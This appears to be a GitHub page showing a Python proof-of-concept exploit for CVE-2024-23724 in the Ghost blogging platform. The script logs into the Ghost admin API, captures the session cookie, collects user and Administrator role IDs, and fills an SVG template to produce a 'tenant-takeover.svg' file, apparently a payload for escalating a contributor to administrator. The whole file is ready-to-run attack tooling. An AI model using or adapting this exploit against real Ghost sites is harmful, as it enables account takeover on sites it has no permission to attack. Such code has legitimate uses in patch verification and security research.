-
Notifications
You must be signed in to change notification settings - Fork 239
/
Copy pathCVE-2024-23724.py
102 lines (83 loc) · 4.19 KB
/
CVE-2024-23724.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
import requests
import argparse
# Set up argparse to accept command line arguments for username, password, and URL
parser = argparse.ArgumentParser(description='Automatically generates an SVG file as a proof-of-concept for CVE-2024-23724')
parser.add_argument('-u', '--username', required=True, type=str, help='Username for authentication')
parser.add_argument('-p', '--password', required=True, type=str, help='Password for authentication')
parser.add_argument('-t', '--target', required=True, type=str, help='Target URL for the Ghost API')
args = parser.parse_args()
# Base URL for the Ghost API
base_url = args.target
# URL for the authentication POST request
auth_url = f"{base_url}:3001/ghost/api/admin/session"
# Headers for the authentication request
auth_headers = {
"Content-Type": "application/json;charset=UTF-8",
"X-Ghost-Version": "5.75",
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36",
"Accept": "text/plain, */*; q=0.01"
}
# Payload for the authentication request using command line arguments
auth_payload = {
"username": args.username,
"password": args.password
}
# Send the authentication POST request
auth_response = requests.post(auth_url, json=auth_payload, headers=auth_headers)
# Check if the authentication was successful and extract the cookie
if auth_response.status_code == 201 and 'Set-Cookie' in auth_response.headers:
set_cookie_header = auth_response.headers['Set-Cookie']
session_cookie = set_cookie_header.split(';')[0]
print("Session Cookie:", session_cookie)
else:
print("Failed to authenticate. Status code:", auth_response.status_code)
print("Response body:", auth_response.text)
exit()
# Step 2: Make the GET request using the obtained cookie
# URL for the GET request
get_url = "http://localhost:3001/ghost/api/admin/users/?include=roles"
# Headers for the GET request, including the session cookie
get_headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36",
"Content-Type": "application/json; charset=UTF-8",
"Accept": "application/json, text/javascript, */*; q=0.01",
"X-Ghost-Version": "5.75",
"Cookie": session_cookie
}
# Send the GET request
get_response = requests.get(get_url, headers=get_headers)
# Check if the GET request was successful
if get_response.status_code == 200:
try:
users_data = get_response.json()["users"]
# Find the user with the matching username
user_info = next((user for user in users_data if user["email"] == args.username), None)
# Find a user with the "Administrator" role to get the Role ID
admin_role_info = next((user for user in users_data if any(role['name'] == 'Administrator' for role in user['roles'])), None)
admin_role_id = admin_role_info['roles'][0]['id'] if admin_role_info else '[Admin-Role-ID]'
if user_info:
# Extract required user information
user_id = user_info["id"]
username = user_info["name"]
slug_name = user_info["slug"]
user_email = user_info["email"]
# Read the SVG template from a file
with open("boilerplate.svg", "r") as file:
svg_template = file.read()
# Replace placeholders in the SVG template
svg_output = svg_template.replace('[User-ID]', user_id)
svg_output = svg_output.replace('[User-Name]', username)
svg_output = svg_output.replace('[Slug-Name]', slug_name)
svg_output = svg_output.replace('[User-Email]', user_email)
svg_output = svg_output.replace('[Admin-Role-ID]', admin_role_id)
# Write the modified SVG to a new file
with open("tenant-takeover.svg", "w") as output_file:
output_file.write(svg_output)
print("SVG Code written to tenant-takeover.svg")
else:
print("User not found.")
except Exception as e:
print("Error processing the response or modifying the SVG:", e)
else:
print("GET Request failed. Status code:", get_response.status_code)
print("Response body:", get_response.text)